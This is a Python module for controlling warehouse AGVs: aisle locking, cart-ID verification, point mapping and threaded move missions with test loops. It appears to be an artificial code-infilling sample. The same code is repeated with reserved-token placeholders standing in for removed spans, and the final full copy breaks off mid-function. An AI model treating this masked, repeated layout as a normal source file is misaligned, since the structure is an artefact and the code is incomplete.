loc, type = api.getMissionType('put', srcLoc, locId)
api.move(agvId, loc + '.3')
api.mission(agvId, type)
lockStockA(agvId, locId)
try:
api.move(agvId, locId + '.4')
api.mission(agvId, 5)
api.move(agvId, locId + '.5')
finally:
unlockStockA(agvId, locId)
freeAgv(agvId)
def moveCart(agvId, cartId, srcLoc, locId, finishCallback, obj):
_initObj(obj, agvId)
assert api.isCartLoc(cartId)
srcLoc = getOriginPoint(srcLoc)
locId = getOriginPoint(locId)
try:
_run(func=_moveCart, args=(agvId, srcLoc, locId, cartId), callback=
finishCallback, obj=obj)
except Exception as e:
restAgv(agvId)
freeAgv(agvId)
raise e
def move(agvId, locId, finishCallback, obj):
_initObj(obj, agvId)
try:
locId = getOriginPoint(locId)
_run(func=api.move, args=(agvId, locId), callback=finishCallback,
obj=obj)
except Exception as e:
freeAgv(agvId)
raise e
def freeAgv(agvId):
try:
api.unlock(agvId)
except Exception as e:
log.exception('freeAgv', e)
def restAgv(agvId):
agvId2 = api.getAgvId(agvId)
api.reset(agvId2)
<|reserved_special_token_0|>
def testgetPoint():
resulta = getPoint('StockA_row7_col4')
assert resulta == 'begin_1'
resultb = getPoint('StockA_row8_col4')
assert resultb == 'begin_2'
def testgetOrginPoint():
resulta = getOriginPoint('begin_1')
assert resulta == 'StockA_row7_col4'
resultb = getOriginPoint('begin_2')
assert resultb == 'StockA_row8_col4'
resultc = getOriginPoint('hhahahaa')
assert resultc == 'hhahahaa'
def testgetStockA():
assert getStockA('stockA_row10_col3') == 9003
assert getStockA('stockA_row10_col4') == 9004
assert getStockA('stockA_row1_col1') == 1001
assert getStockA('stockA_row2_col2') == 1002
assert getStockA('stockA_row3_col2') == 3002
assert getStockA('stockA_row4_col2') == 3002
assert getStockA('stockA_row4_col2.1') == 3002
assert getStockA('stockB_row4_col2.1') == None
assert getStockA('begin_1') == None
assert getStockA('seat_1') == None
def testcheckCart():
global g_carts
g_carts = None
checkCart('CART9001', '591')
checkCart('CART9002', '592')
gg = json_codec.load_file('cart.cfg')
assert 'CART9001' in gg
assert 'CART9002' in gg
assert gg['CART9001'] == '591'
assert gg['CART9002'] == '592'
checkCart('CART9002', '592')
checkCart('CART9001', '591')
try:
checkCart('CART9002', '591')
assert 0
except Exception as e:
s = str(e)
assert s.find('货架ID不正确,期望货架:CART9002, 实际货架:CART9001') != -1
<|reserved_special_token_0|>
def func2(stock1, stock2):
print('-------------------- start thread ------------------------',
stock1, stock2)
time.sleep(1)
cartId = 'CART9009'
for i in range(20):
print('current loop is - ', i.__str__())
move_cart(cartId, stock1, stock2)
move_cart(cartId, stock2, stock1)
print('current loop end - ', i.__str__())
print('=======================================')
print('finish func2')
print('=======================================')
def func3(times, starts, seats):
current = starts
cartId = 'CART9009'
time.sleep(1)
for loop in range(0, times - 1):
tip1 = 'currentLoop is ' + loop.__str__(
) + ' currentStart is ' + current
print(tip1)
for i in range(0, len(seats)):
next = str(seats[i])
tip2 = ('currentLoop is ' + loop.__str__() +
'currentOrigin is ' + current + 'currentNext is ' + next +
' seatIndex is ' + i.__str__())
print(tip2)
print('excuting')
move_cart(cartId, current, next)
current = next
def testPageAgvControl(jsonstr):
jsonData = json.loads(jsonstr)
result = False
if len(jsonData) == 0:
result = False
else:
for currentJson in jsonData:
start = currentJson['start']
seat = currentJson['seat']
loop = int(currentJson['loop'])
seats = str.split(seat, ',')
durabilityTestTask1 = threading.Thread(target=func3, args=[loop,
start, seats])
durabilityTestTask1.start()
result = True
return result
<|reserved_special_token_0|>
def testPageUnloockAll():
api.unlockAll()
<|reserved_special_token_0|>
def test1():
Init()
durabilityTestTask1 = threading.Thread(target=func3, args=[20,
'stockA_row1_col3', ['stockA_row1_col2', 'stockA_row1_col4']])
durabilityTestTask1.start()
durabilityTestTask2 = threading.Thread(target=func3, args=[20,
'stockA_row1_col2', ['seat2_1', 'stockA_row4_col2']])
durabilityTestTask3 = threading.Thread(target=func3, args=[20,
'stockA_row5_col3', ['seat16_1', 'stockA_row5_col2']])
durabilityTestTask4 = threading.Thread(target=func3, args=[20,
'stockA_row6_col3', ['seat12_1', 'stockA_row6_col2']])
durabilityTestTask1.join()
print('===============ALL FINISH ========================')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@utility.init()
def init():
if utility.is_test():
return
api.init()
time.sleep(3)
def wait():
global g_threads
for t in g_threads:
t.join()
g_threads.clear()
@utility.fini()
def fini():
if utility.is_test():
return
api.fini()
wait()
<|reserved_special_token_0|>
def getStockA(loc):
if loc[0:6] != 'stockA':
return None
m = re.search('stockA_row(\\d+)_col(\\d+).*', loc)
if m is None:
return None
row = int(m.group(1))
col = int(m.group(2))
if row is None:
return
if row % 2 != 1:
row -= 1
return row * 1000 + col
@lock.lock(g_lock)
def checkTimeout(index, agvId, loc):
global g_stockLock
if index in g_stockLock:
if utility.ticks() - g_stockLock[index] > 10 * 60 * 1000:
unlockStockA(agvId, loc)
log.warning('delete timeout locked', index)
def lockStockA(agvId, loc):
global g_stockLock
index = getStockA(loc)
if index is None:
return
if index in g_stockLock:
checkTimeout(index, agvId, loc)
log.warning(agvId, loc, 'is locked, wait for unlock')
for i in range(60 * 5):
if index not in g_stockLock:
break
time.sleep(1)
log.info(agvId, loc, 'wait for unlock success')
global g_lock
log.debug(agvId, 'lock', loc, index)
g_lock.acquire()
g_stockLock[index] = utility.ticks()
g_lock.release()
@lock.lock(g_lock)
def unlockStockA(agvId, loc):
global g_stockLock
index = getStockA(loc)
if index in g_stockLock:
log.debug(agvId, 'unlock', loc, index)
del g_stockLock[index]
@lock.lock(g_lock)
def getPoint(originPoint):
global g_point
loadPoint()
if g_point[originPoint] is not None:
return g_point[originPoint]
return originPoint
@lock.lock(g_lock)
def getOriginPoint(point):
global g_point
loadPoint()
for itemIndex in g_point:
if g_point[itemIndex] == point:
return itemIndex
return point
@lock.lock(g_lock)
def loadPoint():
global g_point
filePath = os.path.dirname(__file__)
fileName = 'point.cfg'
if filePath:
fileName = filePath + '/' + fileName
g_point = json_codec.load_file(fileName)
@lock.lock(g_lock)
def checkCart(cartId, scanId):
scanId = scanId.strip()
def loadCart():
global g_carts
p = os.path.dirname(__file__)
pp = 'cart.cfg'
if p:
pp = p + '/' + pp
g_carts = json_codec.load_file(pp)
def saveCart():
global g_carts
p = os.path.dirname(__file__)
pp = 'cart.cfg'
if p:
pp = p + '/' + pp
json_codec.dump_file(pp, g_carts)
def findCart(scanId):
global g_carts
for c in g_carts:
if g_carts[c] == scanId:
return c
return 'unknown'
global g_carts
if g_carts is None:
loadCart()
if cartId in g_carts:
if scanId != g_carts[cartId]:
log.error('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart(scanId))
raise Exception('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart
(scanId))
else:
g_carts[cartId] = scanId
saveCart()
def _run(func, args, callback, obj):
def threadFunc(func, args, callback, obj):
hasCallback = False
try:
func(*args)
if utility.is_exited():
return
hasCallback = True
callback(obj)
except Exception as e:
obj['result'] = -1
obj['resultDesc'] = str(e)
log.exception('agvCtrl:', e)
if 'agv' in obj:
agvId = obj['agv']
log.debug('小车:' + agvId + ',出现未经处理的异常,正在返航 ')
restAgv(agvId)
freeAgv(agvId)
if not hasCallback:
callback(obj)
t = threading.Thread(target=threadFunc, args=(func, args, callback, obj))
global g_threads
t.start()
g_threads.append(t)
def _initObj(obj, agvId):
obj['agv'] = agvId
obj['result'] = 0
obj['resultDesc'] = 'success'
def _call(agvId, locId):
if api.isCartLoc(locId):
api.move(agvId, locId + '.1')
lockStockA(agvId, locId)
try:
api.mission(agvId, 1)
except Exception as e:
unlockStockA(agvId, locId)
raise e
else:
api.move(agvId, locId)
def apply(locId):
locId = getOriginPoint(locId)
return api.apply(locId + '.1')
def call(agvId, locId, finishCallback, obj):
_initObj(obj, agvId)
locId = getOriginPoint(locId)
try:
_run(func=_call, args=(agvId, locId), callback=finishCallback, obj=obj)
except Exception as e:
restAgv(agvId)
freeAgv(agvId)
raise e
return agvId
def _moveCart(agvId, srcLoc, locId, cartId):
try:
c = api.mission(agvId, 2)
if c:
checkCart(cartId, c)
api.move(agvId, srcLoc + '.2')
except Exception as e:
pass
finally:
unlockStockA(agvId, srcLoc)
loc, type = api.getMissionType('get', '', srcLoc)
api.mission(agvId, type)
loc, type = api.getMissionType('put', srcLoc, locId)
api.move(agvId, loc + '.3')
api.mission(agvId, type)
lockStockA(agvId, locId)
try:
api.move(agvId, locId + '.4')
api.mission(agvId, 5)
api.move(agvId, locId + '.5')
finally:
unlockStockA(agvId, locId)
freeAgv(agvId)
def moveCart(agvId, cartId, srcLoc, locId, finishCallback, obj):
_initObj(obj, agvId)
assert api.isCartLoc(cartId)
srcLoc = getOriginPoint(srcLoc)
locId = getOriginPoint(locId)
try:
_run(func=_moveCart, args=(agvId, srcLoc, locId, cartId), callback=
finishCallback, obj=obj)
except Exception as e:
restAgv(agvId)
freeAgv(agvId)
raise e
def move(agvId, locId, finishCallback, obj):
_initObj(obj, agvId)
try:
locId = getOriginPoint(locId)
_run(func=api.move, args=(agvId, locId), callback=finishCallback,
obj=obj)
except Exception as e:
freeAgv(agvId)
raise e
def freeAgv(agvId):
try:
api.unlock(agvId)
except Exception as e:
log.exception('freeAgv', e)
def restAgv(agvId):
agvId2 = api.getAgvId(agvId)
api.reset(agvId2)
<|reserved_special_token_0|>
def testgetPoint():
resulta = getPoint('StockA_row7_col4')
assert resulta == 'begin_1'
resultb = getPoint('StockA_row8_col4')
assert resultb == 'begin_2'
def testgetOrginPoint():
resulta = getOriginPoint('begin_1')
assert resulta == 'StockA_row7_col4'
resultb = getOriginPoint('begin_2')
assert resultb == 'StockA_row8_col4'
resultc = getOriginPoint('hhahahaa')
assert resultc == 'hhahahaa'
def testgetStockA():
assert getStockA('stockA_row10_col3') == 9003
assert getStockA('stockA_row10_col4') == 9004
assert getStockA('stockA_row1_col1') == 1001
assert getStockA('stockA_row2_col2') == 1002
assert getStockA('stockA_row3_col2') == 3002
assert getStockA('stockA_row4_col2') == 3002
assert getStockA('stockA_row4_col2.1') == 3002
assert getStockA('stockB_row4_col2.1') == None
assert getStockA('begin_1') == None
assert getStockA('seat_1') == None
def testcheckCart():
global g_carts
g_carts = None
checkCart('CART9001', '591')
checkCart('CART9002', '592')
gg = json_codec.load_file('cart.cfg')
assert 'CART9001' in gg
assert 'CART9002' in gg
assert gg['CART9001'] == '591'
assert gg['CART9002'] == '592'
checkCart('CART9002', '592')
checkCart('CART9001', '591')
try:
checkCart('CART9002', '591')
assert 0
except Exception as e:
s = str(e)
assert s.find('货架ID不正确,期望货架:CART9002, 实际货架:CART9001') != -1
<|reserved_special_token_0|>
def func2(stock1, stock2):
print('-------------------- start thread ------------------------',
stock1, stock2)
time.sleep(1)
cartId = 'CART9009'
for i in range(20):
print('current loop is - ', i.__str__())
move_cart(cartId, stock1, stock2)
move_cart(cartId, stock2, stock1)
print('current loop end - ', i.__str__())
print('=======================================')
print('finish func2')
print('=======================================')
def func3(times, starts, seats):
current = starts
cartId = 'CART9009'
time.sleep(1)
for loop in range(0, times - 1):
tip1 = 'currentLoop is ' + loop.__str__(
) + ' currentStart is ' + current
print(tip1)
for i in range(0, len(seats)):
next = str(seats[i])
tip2 = ('currentLoop is ' + loop.__str__() +
'currentOrigin is ' + current + 'currentNext is ' + next +
' seatIndex is ' + i.__str__())
print(tip2)
print('excuting')
move_cart(cartId, current, next)
current = next
def testPageAgvControl(jsonstr):
jsonData = json.loads(jsonstr)
result = False
if len(jsonData) == 0:
result = False
else:
for currentJson in jsonData:
start = currentJson['start']
seat = currentJson['seat']
loop = int(currentJson['loop'])
seats = str.split(seat, ',')
durabilityTestTask1 = threading.Thread(target=func3, args=[loop,
start, seats])
durabilityTestTask1.start()
result = True
return result
<|reserved_special_token_0|>
def testPageUnloockAll():
api.unlockAll()
<|reserved_special_token_0|>
def test1():
Init()
durabilityTestTask1 = threading.Thread(target=func3, args=[20,
'stockA_row1_col3', ['stockA_row1_col2', 'stockA_row1_col4']])
durabilityTestTask1.start()
durabilityTestTask2 = threading.Thread(target=func3, args=[20,
'stockA_row1_col2', ['seat2_1', 'stockA_row4_col2']])
durabilityTestTask3 = threading.Thread(target=func3, args=[20,
'stockA_row5_col3', ['seat16_1', 'stockA_row5_col2']])
durabilityTestTask4 = threading.Thread(target=func3, args=[20,
'stockA_row6_col3', ['seat12_1', 'stockA_row6_col2']])
durabilityTestTask1.join()
print('===============ALL FINISH ========================')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@utility.init()
def init():
if utility.is_test():
return
api.init()
time.sleep(3)
def wait():
global g_threads
for t in g_threads:
t.join()
g_threads.clear()
@utility.fini()
def fini():
if utility.is_test():
return
api.fini()
wait()
<|reserved_special_token_0|>
def getStockA(loc):
if loc[0:6] != 'stockA':
return None
m = re.search('stockA_row(\\d+)_col(\\d+).*', loc)
if m is None:
return None
row = int(m.group(1))
col = int(m.group(2))
if row is None:
return
if row % 2 != 1:
row -= 1
return row * 1000 + col
@lock.lock(g_lock)
def checkTimeout(index, agvId, loc):
global g_stockLock
if index in g_stockLock:
if utility.ticks() - g_stockLock[index] > 10 * 60 * 1000:
unlockStockA(agvId, loc)
log.warning('delete timeout locked', index)
def lockStockA(agvId, loc):
global g_stockLock
index = getStockA(loc)
if index is None:
return
if index in g_stockLock:
checkTimeout(index, agvId, loc)
log.warning(agvId, loc, 'is locked, wait for unlock')
for i in range(60 * 5):
if index not in g_stockLock:
break
time.sleep(1)
log.info(agvId, loc, 'wait for unlock success')
global g_lock
log.debug(agvId, 'lock', loc, index)
g_lock.acquire()
g_stockLock[index] = utility.ticks()
g_lock.release()
@lock.lock(g_lock)
def unlockStockA(agvId, loc):
global g_stockLock
index = getStockA(loc)
if index in g_stockLock:
log.debug(agvId, 'unlock', loc, index)
del g_stockLock[index]
@lock.lock(g_lock)
def getPoint(originPoint):
global g_point
loadPoint()
if g_point[originPoint] is not None:
return g_point[originPoint]
return originPoint
@lock.lock(g_lock)
def getOriginPoint(point):
global g_point
loadPoint()
for itemIndex in g_point:
if g_point[itemIndex] == point:
return itemIndex
return point
@lock.lock(g_lock)
def loadPoint():
global g_point
filePath = os.path.dirname(__file__)
fileName = 'point.cfg'
if filePath:
fileName = filePath + '/' + fileName
g_point = json_codec.load_file(fileName)
@lock.lock(g_lock)
def checkCart(cartId, scanId):
scanId = scanId.strip()
def loadCart():
global g_carts
p = os.path.dirname(__file__)
pp = 'cart.cfg'
if p:
pp = p + '/' + pp
g_carts = json_codec.load_file(pp)
def saveCart():
global g_carts
p = os.path.dirname(__file__)
pp = 'cart.cfg'
if p:
pp = p + '/' + pp
json_codec.dump_file(pp, g_carts)
def findCart(scanId):
global g_carts
for c in g_carts:
if g_carts[c] == scanId:
return c
return 'unknown'
global g_carts
if g_carts is None:
loadCart()
if cartId in g_carts:
if scanId != g_carts[cartId]:
log.error('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart(scanId))
raise Exception('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart
(scanId))
else:
g_carts[cartId] = scanId
saveCart()
def _run(func, args, callback, obj):
def threadFunc(func, args, callback, obj):
hasCallback = False
try:
func(*args)
if utility.is_exited():
return
hasCallback = True
callback(obj)
except Exception as e:
obj['result'] = -1
obj['resultDesc'] = str(e)
log.exception('agvCtrl:', e)
if 'agv' in obj:
agvId = obj['agv']
log.debug('小车:' + agvId + ',出现未经处理的异常,正在返航 ')
restAgv(agvId)
freeAgv(agvId)
if not hasCallback:
callback(obj)
t = threading.Thread(target=threadFunc, args=(func, args, callback, obj))
global g_threads
t.start()
g_threads.append(t)
def _initObj(obj, agvId):
obj['agv'] = agvId
obj['result'] = 0
obj['resultDesc'] = 'success'
def _call(agvId, locId):
if api.isCartLoc(locId):
api.move(agvId, locId + '.1')
lockStockA(agvId, locId)
try:
api.mission(agvId, 1)
except Exception as e:
unlockStockA(agvId, locId)
raise e
else:
api.move(agvId, locId)
def apply(locId):
locId = getOriginPoint(locId)
return api.apply(locId + '.1')
def call(agvId, locId, finishCallback, obj):
_initObj(obj, agvId)
locId = getOriginPoint(locId)
try:
_run(func=_call, args=(agvId, locId), callback=finishCallback, obj=obj)
except Exception as e:
restAgv(agvId)
freeAgv(agvId)
raise e
return agvId
def _moveCart(agvId, srcLoc, locId, cartId):
try:
c = api.mission(agvId, 2)
if c:
checkCart(cartId, c)
api.move(agvId, srcLoc + '.2')
except Exception as e:
pass
finally:
unlockStockA(agvId, srcLoc)
loc, type = api.getMissionType('get', '', srcLoc)
api.mission(agvId, type)
loc, type = api.getMissionType('put', srcLoc, locId)
api.move(agvId, loc + '.3')
api.mission(agvId, type)
lockStockA(agvId, locId)
try:
api.move(agvId, locId + '.4')
api.mission(agvId, 5)
api.move(agvId, locId + '.5')
finally:
unlockStockA(agvId, locId)
freeAgv(agvId)
def moveCart(agvId, cartId, srcLoc, locId, finishCallback, obj):
_initObj(obj, agvId)
assert api.isCartLoc(cartId)
srcLoc = getOriginPoint(srcLoc)
locId = getOriginPoint(locId)
try:
_run(func=_moveCart, args=(agvId, srcLoc, locId, cartId), callback=
finishCallback, obj=obj)
except Exception as e:
restAgv(agvId)
freeAgv(agvId)
raise e
def move(agvId, locId, finishCallback, obj):
_initObj(obj, agvId)
try:
locId = getOriginPoint(locId)
_run(func=api.move, args=(agvId, locId), callback=finishCallback,
obj=obj)
except Exception as e:
freeAgv(agvId)
raise e
def freeAgv(agvId):
try:
api.unlock(agvId)
except Exception as e:
log.exception('freeAgv', e)
def restAgv(agvId):
agvId2 = api.getAgvId(agvId)
api.reset(agvId2)
def Init():
import interface.dashboard.dashboardApi
locationEvent.connect(interface.dashboard.dashboardApi.reportAgvLoc)
time.sleep(3)
def testgetPoint():
resulta = getPoint('StockA_row7_col4')
assert resulta == 'begin_1'
resultb = getPoint('StockA_row8_col4')
assert resultb == 'begin_2'
def testgetOrginPoint():
resulta = getOriginPoint('begin_1')
assert resulta == 'StockA_row7_col4'
resultb = getOriginPoint('begin_2')
assert resultb == 'StockA_row8_col4'
resultc = getOriginPoint('hhahahaa')
assert resultc == 'hhahahaa'
def testgetStockA():
assert getStockA('stockA_row10_col3') == 9003
assert getStockA('stockA_row10_col4') == 9004
assert getStockA('stockA_row1_col1') == 1001
assert getStockA('stockA_row2_col2') == 1002
assert getStockA('stockA_row3_col2') == 3002
assert getStockA('stockA_row4_col2') == 3002
assert getStockA('stockA_row4_col2.1') == 3002
assert getStockA('stockB_row4_col2.1') == None
assert getStockA('begin_1') == None
assert getStockA('seat_1') == None
def testcheckCart():
global g_carts
g_carts = None
checkCart('CART9001', '591')
checkCart('CART9002', '592')
gg = json_codec.load_file('cart.cfg')
assert 'CART9001' in gg
assert 'CART9002' in gg
assert gg['CART9001'] == '591'
assert gg['CART9002'] == '592'
checkCart('CART9002', '592')
checkCart('CART9001', '591')
try:
checkCart('CART9002', '591')
assert 0
except Exception as e:
s = str(e)
assert s.find('货架ID不正确,期望货架:CART9002, 实际货架:CART9001') != -1
<|reserved_special_token_0|>
@counter.count
def move_cart(cartId, srcLoc, destLoc, agvId=None):
print(cartId, srcLoc, destLoc)
counter.setPrint(True)
def callback1(obj):
if obj['result'] == -1:
print('error, system exit')
obj['finish'] = True
sys.exit(-1)
else:
log.warning(obj['agv'], 'start move from', obj['loc1'], 'to',
obj['loc2'])
moveCart(obj['agv'], obj['cart'], obj['loc1'], obj['loc2'],
callback2, obj)
def callback2(obj):
if obj['result'] == -1:
print('error, system exit')
obj['finish'] = True
sys.exit(-1)
else:
log.warning(obj['agv'], 'arrived', obj['loc2'])
obj['finish'] = True
obj = {}
obj['loc1'] = srcLoc
obj['loc2'] = destLoc
obj['cart'] = cartId
print('call ', srcLoc)
if agvId is None:
agvId = apply(srcLoc)
call(agvId, srcLoc, callback1, obj)
while not utility.is_exited():
if 'finish' in obj:
break
time.sleep(0.2)
print('------ move ', srcLoc, ' to ', destLoc, ' finish ------')
def func2(stock1, stock2):
print('-------------------- start thread ------------------------',
stock1, stock2)
time.sleep(1)
cartId = 'CART9009'
for i in range(20):
print('current loop is - ', i.__str__())
move_cart(cartId, stock1, stock2)
move_cart(cartId, stock2, stock1)
print('current loop end - ', i.__str__())
print('=======================================')
print('finish func2')
print('=======================================')
def func3(times, starts, seats):
current = starts
cartId = 'CART9009'
time.sleep(1)
for loop in range(0, times - 1):
tip1 = 'currentLoop is ' + loop.__str__(
) + ' currentStart is ' + current
print(tip1)
for i in range(0, len(seats)):
next = str(seats[i])
tip2 = ('currentLoop is ' + loop.__str__() +
'currentOrigin is ' + current + 'currentNext is ' + next +
' seatIndex is ' + i.__str__())
print(tip2)
print('excuting')
move_cart(cartId, current, next)
current = next
def testPageAgvControl(jsonstr):
jsonData = json.loads(jsonstr)
result = False
if len(jsonData) == 0:
result = False
else:
for currentJson in jsonData:
start = currentJson['start']
seat = currentJson['seat']
loop = int(currentJson['loop'])
seats = str.split(seat, ',')
durabilityTestTask1 = threading.Thread(target=func3, args=[loop,
start, seats])
durabilityTestTask1.start()
result = True
return result
def testtestPageAgvControl(jsonstr):
jsonData = json.loads(jsonstr)
result = False
if len(jsonData) == 0:
result = False
else:
for currentJson in jsonData:
start = currentJson['start']
print(start)
time.sleep(3)
seat = currentJson['seat']
seats = str.split(seat, ',')
print(seat)
time.sleep(3)
for currentseat in seats:
print(currentseat)
time.sleep(3)
time.sleep(10)
result = True
return result
def testPageUnloockAll():
api.unlockAll()
def testProcess(jsonData):
utility.start()
testPageAgvControl(jsonData)
utility.finish()
def test1():
Init()
durabilityTestTask1 = threading.Thread(target=func3, args=[20,
'stockA_row1_col3', ['stockA_row1_col2', 'stockA_row1_col4']])
durabilityTestTask1.start()
durabilityTestTask2 = threading.Thread(target=func3, args=[20,
'stockA_row1_col2', ['seat2_1', 'stockA_row4_col2']])
durabilityTestTask3 = threading.Thread(target=func3, args=[20,
'stockA_row5_col3', ['seat16_1', 'stockA_row5_col2']])
durabilityTestTask4 = threading.Thread(target=func3, args=[20,
'stockA_row6_col3', ['seat12_1', 'stockA_row6_col2']])
durabilityTestTask1.join()
print('===============ALL FINISH ========================')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
#coding=utf-8
# ycat 2017-10-20 create
# AGV的控制
import sys,os
import json
import setup
if __name__ == '__main__':
setup.setCurPath(__file__)
import utility
import enhance
import threading
import time
import log
import re
import lock
import json_codec
import driver.agv.hdcAgvApi as api
g_threads =[]
g_carts = None
g_point = None
g_lock = threading.RLock()
locationEvent = enhance.event()
api.locationEvent.connect(locationEvent.emit)
@utility.init()
def init():
    # Module startup hook (registered via utility.init): bring up the AGV
    # driver unless we are running under unit tests.
    if utility.is_test():
        return
    api.init()
    time.sleep(3)   # give the driver time to connect before use
def wait():
    """Join every worker thread spawned via _run(), emptying the registry."""
    global g_threads
    while g_threads:
        g_threads.pop(0).join()
@utility.fini()
def fini():
    # Module shutdown hook: stop the driver, then join outstanding worker
    # threads.  Skipped entirely under unit tests (mirrors init()).
    if utility.is_test():
        return
    api.fini()
    wait()
g_stockLock = {}
def getStockA(loc):
    """Map a stockA location name to a numeric aisle index, or None.

    'stockA_row<R>_col<C>...' -> R*1000 + C, where even rows are normalized
    down to the preceding odd row (rows 3 and 4 share one aisle, so both
    'stockA_row3_col2' and 'stockA_row4_col2' yield 3002).  Any name that
    is not a stockA location returns None.
    """
    if not loc.startswith("stockA"):
        return None
    # Raw string avoids the invalid '\d' escape warning of the original.
    m = re.search(r"stockA_row(\d+)_col(\d+).*", loc)
    if m is None:
        return None
    row = int(m.group(1))   # int() always succeeds here (regex matched digits),
    col = int(m.group(2))   # so the original's dead 'row is None' check is gone
    if row % 2 != 1:
        row -= 1
    return row * 1000 + col
@lock.lock(g_lock)
def checkTimeout(index,agvId,loc):
    # Drop an aisle lock held for more than 10 minutes — assumed stale
    # (the holder crashed or forgot to unlock).
    global g_stockLock
    if index in g_stockLock:
        if utility.ticks() - g_stockLock[index] > 10*60*1000:   # ticks are ms
            unlockStockA(agvId,loc)
            log.warning("delete timeout locked",index)
#Avoid head-on collisions inside stockA: only one AGV may occupy a given
#aisle (see getStockA) at a time.
def lockStockA(agvId,loc):
    """Acquire the aisle lock for *loc*; no-op outside stockA.

    If the aisle is already locked, waits up to ~5 minutes (polling once a
    second) for it to be released, discarding stale locks first.  The lock
    table stores the acquisition tick for the timeout check.
    """
    global g_stockLock
    index = getStockA(loc)
    if index is None:
        return   # not a stockA location: nothing to serialize
    if index in g_stockLock:
        checkTimeout(index,agvId,loc)   # purge a stale (>10 min) holder
        log.warning(agvId,loc,"is locked, wait for unlock")
        for i in range(60*5):           # poll 1/s, give up after 5 minutes
            if index not in g_stockLock:
                break
            time.sleep(1)
        log.info(agvId,loc,"wait for unlock success")
    global g_lock
    log.debug(agvId,"lock",loc,index)
    g_lock.acquire()                    # guard the shared lock table
    g_stockLock[index] = utility.ticks()
    g_lock.release()
@lock.lock(g_lock)
def unlockStockA(agvId,loc):
    """Release the aisle lock for *loc*, if this module holds one."""
    global g_stockLock
    aisle = getStockA(loc)
    if aisle in g_stockLock:
        log.debug(agvId,"unlock",loc,aisle)
        g_stockLock.pop(aisle)
@lock.lock(g_lock)
def getPoint(originPoint):
    """Translate an origin point name to its alias from point.cfg.

    Falls back to *originPoint* itself when no mapping exists.  The
    original indexed g_point directly, which raised KeyError for unknown
    points and made the fallback unreachable; .get() makes the evidently
    intended pass-through (mirroring getOriginPoint) actually work.
    """
    global g_point
    loadPoint()
    mapped = g_point.get(originPoint)
    if mapped is not None:
        return mapped
    return originPoint
@lock.lock(g_lock)
def getOriginPoint(point):
    """Reverse of getPoint: map an alias back to its origin point name.

    Unknown aliases pass through unchanged.
    """
    global g_point
    loadPoint()
    hits = [origin for origin, alias in g_point.items() if alias == point]
    return hits[0] if hits else point
@lock.lock(g_lock)
def loadPoint():
    """(Re)load the point-name mapping from point.cfg beside this module."""
    global g_point
    base = os.path.dirname(__file__)
    cfg = "point.cfg"
    g_point = json_codec.load_file(base + "/" + cfg if base else cfg)
@lock.lock(g_lock)
def checkCart(cartId,scanId):
    """Verify the shelf id scanned by the AGV matches the expected cart.

    Known (cartId -> scanId) pairs are persisted in cart.cfg next to this
    module; an unknown cartId is learned and stored on first sight.
    Raises Exception on mismatch (message text is in Chinese: "shelf ID
    incorrect, expected ..., actual ...").
    """
    scanId = scanId.strip()
    def loadCart():
        # Populate g_carts from cart.cfg.
        global g_carts
        p = os.path.dirname(__file__)
        pp = "cart.cfg"
        if p:
            pp = p+"/"+pp
        g_carts = json_codec.load_file(pp)
    def saveCart():
        # Persist g_carts back to cart.cfg.
        global g_carts
        p = os.path.dirname(__file__)
        pp = "cart.cfg"
        if p:
            pp = p+"/"+pp
        json_codec.dump_file(pp,g_carts)
    def findCart(scanId):
        # Reverse lookup: which cart id owns this scanned shelf id?
        global g_carts
        for c in g_carts:
            if g_carts[c] == scanId:
                return c
        return "unknown"
    global g_carts
    if g_carts is None:
        loadCart()   # lazy one-time load
    if cartId in g_carts:
        if scanId != g_carts[cartId]:
            log.error("货架ID不正确,期望货架:"+cartId+", 实际货架:"+findCart(scanId))
            raise Exception("货架ID不正确,期望货架:"+cartId+", 实际货架:"+findCart(scanId))
    else:
        g_carts[cartId] = scanId   # first sighting: learn the pair
        saveCart()
#finishCallback signature: finishCallback(obj)
#obj automatically carries these three keys:
#obj["agv"] = agvId
#obj["result"] = 0
#obj["resultDesc"] = "success"
def _run(func,args,callback,obj):
    """Run func(*args) on a worker thread, then invoke callback(obj) once.

    On exception, obj["result"] is set to -1 with the message in
    obj["resultDesc"], the AGV (if obj carries one) is reset and released,
    and the callback still fires exactly once.  The thread is recorded in
    g_threads so fini()/wait() can join it.
    """
    def threadFunc(func,args,callback,obj):
        hasCallback = False
        try:
            func(*args)
            if utility.is_exited():
                return   # process is shutting down: skip the callback
            hasCallback = True
            callback(obj)
        except Exception as e:
            obj["result"] = -1
            obj["resultDesc"] = str(e)
            log.exception("agvCtrl:",e)
            if "agv" in obj:
                agvId= obj["agv"]
                log.debug("小车:"+agvId+",出现未经处理的异常,正在返航 ")
                restAgv(agvId)   # unhandled failure: send the AGV home
                freeAgv(agvId)
            if not hasCallback:
                callback(obj)    # guarantee exactly one callback invocation
    t = threading.Thread(target=threadFunc,args=(func,args,callback,obj))
    global g_threads
    t.start()
    g_threads.append(t)
def _initObj(obj,agvId):
obj["agv"] = agvId
obj["result"] = 0
obj["resultDesc"] = "success"
def _call(agvId,locId):
    # Drive the AGV to locId.  For cart locations it additionally crawls
    # under the shelf and scans its id (mission 1) while holding the aisle
    # lock; the lock is released if the mission fails.
    if api.isCartLoc(locId):
        api.move(agvId,locId+".1")
        lockStockA(agvId,locId)
        try:
            api.mission(agvId,1) #rotate -> crawl under the shelf -> scan -> returns shelf id
        except Exception as e:
            unlockStockA(agvId,locId)
            raise e
    else:
        api.move(agvId,locId)
def apply(locId):
    """Request an AGV for the approach point of *locId*; returns the AGV id."""
    origin = getOriginPoint(locId)
    return api.apply(origin + ".1")
def call(agvId,locId,finishCallback,obj):
    """Asynchronously send *agvId* to *locId*; finishCallback(obj) fires on completion.

    Returns agvId immediately.  If submitting the task fails, the AGV is
    reset and released before the exception propagates.
    """
    _initObj(obj,agvId)
    locId=getOriginPoint(locId)
    try:
        _run(func=_call,args=(agvId,locId),callback=finishCallback,obj=obj)
    except Exception as e:
        restAgv(agvId)
        freeAgv(agvId)
        raise e
    return agvId
def _moveCart(agvId,srcLoc,locId,cartId):
    # Worker behind moveCart: lift the shelf at srcLoc, carry it to locId,
    # set it down, then release the AGV.  Aisle locks bracket both ends.
    try:
